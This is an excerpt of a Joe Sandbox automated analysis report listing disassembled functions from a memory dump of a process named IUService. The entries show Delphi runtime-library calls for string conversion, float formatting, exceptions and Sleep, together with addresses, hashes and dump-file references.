                                                                                                                                            • API ID: System@@$AnsiStringSystem@System@%$FromUnicode$Str$qqrr20Stringx27T$us$i0$%$Clr$qqrpvInternalRecx27Str$qqrr27String$qqrr15StringusT$us$i0$%iT$us$i0$%x20TextWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1770171856-0
                                                                                                                                            • Opcode ID: f3822a6ceb7ea1d4ed5306455a56ddfc370fb437e991b2596a5427501aefc0ed
                                                                                                                                            • Instruction ID: b5ddcc7ba318723b074cea580f7c3f422d4a35a63fcd16844832d78ca229e7f9
                                                                                                                                            • Opcode Fuzzy Hash: f3822a6ceb7ea1d4ed5306455a56ddfc370fb437e991b2596a5427501aefc0ed
                                                                                                                                            • Instruction Fuzzy Hash: 22117030B052889FEB10CFB8D9A159EB7F9EF49200FA046B6E504D3291EB30DF01D681
                                                                                                                                            Function 50021A30 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021ACE), ref: 50021A70
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021ACE), ref: 50021A92
                                                                                                                                            • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1rx24Sysutils@TFormatSettings.RTL120(?,00000000,00000000,50021ACE), ref: 50021AA4
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021ACE), ref: 50021AB3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$FromStringSysutils@$AnsiFloatStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20FormatInternalLen$qqrr20SettingsStringpbiTextValuet1rx24
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 450212489-0
                                                                                                                                            • Opcode ID: a3dcc1f81dabbd884260d5728da179efc1f7e6ee7e262f411babcf95e230f245
                                                                                                                                            • Instruction ID: 6c94864ea6d5d124ea52cca348c6ec8d64ebc88412d021a3ebff09329b69cbe3
                                                                                                                                            • Opcode Fuzzy Hash: a3dcc1f81dabbd884260d5728da179efc1f7e6ee7e262f411babcf95e230f245
                                                                                                                                            • Instruction Fuzzy Hash: B111523060228AAFEF11DBA8ED5299EB7F9DF54200F544662F505D7251EB70DF40C691
                                                                                                                                            Function 5002F438 Relevance: 9.1, APIs: 6, Instructions: 52COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$String$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Exception@$bctr$qqrx20Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 719264781-0
                                                                                                                                            • Opcode ID: 82279774022d7fecd5dde7ff4b3fe3bf96aa76689d9b5b35dc22427500a0355b
                                                                                                                                            • Instruction ID: a2645b7ded7df6c6dd4538b9128dd2fe1d0b1c7c9240a696d069f83c6a480ba7
                                                                                                                                            • Opcode Fuzzy Hash: 82279774022d7fecd5dde7ff4b3fe3bf96aa76689d9b5b35dc22427500a0355b
                                                                                                                                            • Instruction Fuzzy Hash: 1D117030901649AFDB10DFE9D8926AEBBB9EF99250F91427AE40493281DB749E008A91
                                                                                                                                            Function 50021988 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021A22), ref: 500219C5
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021A22), ref: 500219E7
                                                                                                                                            • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021A22), ref: 500219F8
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021A22), ref: 50021A07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$FromString$AnsiFloatStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20InternalLen$qqrr20StringpbiTextValuet1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220105677-0
                                                                                                                                            • Opcode ID: 006bfad56634e30e1ede2951a2f55d569cdaa5b11a793d97a35f32b4fbe24263
                                                                                                                                            • Instruction ID: 036d74904adcca26afda292c117eb6ff0a0a240ba8c665c9ccc47f17789f53e3
                                                                                                                                            • Opcode Fuzzy Hash: 006bfad56634e30e1ede2951a2f55d569cdaa5b11a793d97a35f32b4fbe24263
                                                                                                                                            • Instruction Fuzzy Hash: 9D115E3061128A9BDF11DBA4E9629DEB7F9EF58200F944672E505D7651EB30EF40CA80
                                                                                                                                            Function 50021AE0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021B7A), ref: 50021B1D
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021B7A), ref: 50021B3F
                                                                                                                                            • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021B7A), ref: 50021B50
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021B7A), ref: 50021B5F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$FromString$AnsiFloatStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20InternalLen$qqrr20StringpbiTextValuet1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220105677-0
                                                                                                                                            • Opcode ID: 10de996a424494fadf64891ef00ac74fcb95426f62f90a68df844ebbb861240a
                                                                                                                                            • Instruction ID: 22b3bb944ed5e654b16ecdf05b6840fd4d7b345ebaa55648a236dabb6c7033cf
                                                                                                                                            • Opcode Fuzzy Hash: 10de996a424494fadf64891ef00ac74fcb95426f62f90a68df844ebbb861240a
                                                                                                                                            • Instruction Fuzzy Hash: A7115E3060128A9FDF12DFA4ED5299EB7F9EB64200F9446A2E505D7252EB309F448690
                                                                                                                                            Function 50027254 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                                                            • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                                                            • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                                                            • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                                                            • @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                                                            • @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Except$Object$qqrv$Addr$qqrvClassClass$qqrp14Free$qqrvMetaObject@Objectp17System@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3884317974-0
                                                                                                                                            • Opcode ID: 67d9d523dcd6260564ebb45294177d8fdd426f7379c81a39e08137fce02da52f
                                                                                                                                            • Instruction ID: e6ed14f667667660170ac11691c6c759c670658a77a7e2590363da686ae2756a
                                                                                                                                            • Opcode Fuzzy Hash: 67d9d523dcd6260564ebb45294177d8fdd426f7379c81a39e08137fce02da52f
                                                                                                                                            • Instruction Fuzzy Hash: DF112870606A81CFF365CF7AED42661B7F1EFAD314B418169E408CB635DA30D881CB60
                                                                                                                                            Function 50030760 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003078A
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003079E
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,500307EF), ref: 500307BB
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,500307EF), ref: 500307CA
                                                                                                                                              • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                              • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                              • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500307EF), ref: 500307CF
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2913030950-0
                                                                                                                                            • Opcode ID: 6f4298eec964639a3ff7582bf64e84ce53078f507fa9f13c27cd35f1816d1073
                                                                                                                                            • Instruction ID: 52d32d863b0f2654399b17d17a4284c2ace4cc9aa2092407aa442c0c846a789d
                                                                                                                                            • Opcode Fuzzy Hash: 6f4298eec964639a3ff7582bf64e84ce53078f507fa9f13c27cd35f1816d1073
                                                                                                                                            • Instruction Fuzzy Hash: 8C117C74D0524A8FDB05CFA8ECA19EFB7B9EB48300F50856AE904E3341D7745A01CAE1
                                                                                                                                            Function 500308A4 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308CE
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308E2
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030933), ref: 500308FF
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030933), ref: 5003090E
                                                                                                                                              • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                              • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                              • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030933), ref: 50030913
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2913030950-0
                                                                                                                                            • Opcode ID: 9e4588ab5fbf3776320f84b4910e65cdf9adfca07252c9cacba831bf2d20f2b7
                                                                                                                                            • Instruction ID: b206631945bac027483975cbfdcde3309e2ada628b630dd74d92ef405ac4078d
                                                                                                                                            • Opcode Fuzzy Hash: 9e4588ab5fbf3776320f84b4910e65cdf9adfca07252c9cacba831bf2d20f2b7
                                                                                                                                            • Instruction Fuzzy Hash: EC113074D0564A9FEB05CFA8EC519EEB7B5EF58300F50456AE904E3341D7745A01CAE1
                                                                                                                                            Function 50002594 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 5000264B
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 50002661
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 5000268F
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 500026A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 909da8435180447502b99cd17005e77f61d8cca13c779df2b902078bd9ee526c
                                                                                                                                            • Instruction ID: 5e3a079f800866a7a99d18f5d12456752269fdda2f1ebf4bbfd7b8be750778e6
                                                                                                                                            • Opcode Fuzzy Hash: 909da8435180447502b99cd17005e77f61d8cca13c779df2b902078bd9ee526c
                                                                                                                                            • Instruction Fuzzy Hash: 2DC16876605A908FF725CF68EDA0355BBE0EB91310F98C36ED9188B3D5C770A844CB82
                                                                                                                                            Function 50010530 Relevance: 9.0, APIs: 6, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120 ref: 50010538
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120 ref: 50010553
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 5001054E
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
